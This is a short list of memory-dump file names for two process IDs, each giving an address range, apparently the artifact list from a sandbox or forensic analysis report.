memory/2360-263-0x00007FF843FA0000-0x00007FF8441A9000-memory.dmp
memory/2360-264-0x0000000004B00000-0x0000000004F00000-memory.dmp
memory/2360-267-0x0000000077A81000-0x0000000077BA3000-memory.dmp
memory/2780-268-0x0000000000FC0000-0x0000000000FC9000-memory.dmp
memory/2360-266-0x0000000076CB0000-0x0000000076F02000-memory.dmp
memory/2780-271-0x0000000002DE0000-0x00000000031E0000-memory.dmp
memory/2780-270-0x0000000002DE0000-0x00000000031E0000-memory.dmp
memory/2780-272-0x00007FF843FA0000-0x00007FF8441A9000-memory.dmp
memory/2780-275-0x00007FF843FA0000-0x00007FF8441A9000-memory.dmp
memory/2780-273-0x0000000002DE0000-0x00000000031E0000-memory.dmp
memory/2780-276-0x0000000076CB0000-0x0000000076F02000-memory.dmp
memory/2780-279-0x0000000002DE0000-0x00000000031E0000-memory.dmp
memory/2780-281-0x00007FF843FA0000-0x00007FF8441A9000-memory.dmp
memory/2360-280-0x0000000003960000-0x00000000039E8000-memory.dmp
memory/2360-278-0x0000000004B00000-0x0000000004F00000-memory.dmp